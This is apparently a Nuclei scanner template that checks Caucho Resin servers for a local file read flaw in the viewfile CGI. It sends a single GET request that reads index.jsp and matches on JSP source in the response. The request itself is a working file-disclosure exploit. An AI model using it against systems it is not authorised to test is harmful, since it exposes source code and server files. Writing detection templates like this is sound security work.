id: resin-viewfile-lfr info: name: Caucho Resin LFR author: princechaddha severity: high description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files. reference: - http://0day5.com/archives/1173/ - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 metadata: max-request: 1 tags: resin,caucho,lfr http: - method: GET path: - "{{BaseURL}}/resin-doc/viewfile/?file=index.jsp" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %" part: body # digest: 4a0a0047304502201af0d0fe917471a9c81db59657a77d99ac7ac09237052f3e32e77b1b2811988502210091b220c611424a76a17595b3595fdf4964633d95928f84924ae4f1b37aa1bfeb:922c64590222798bb761d5b6d8e72950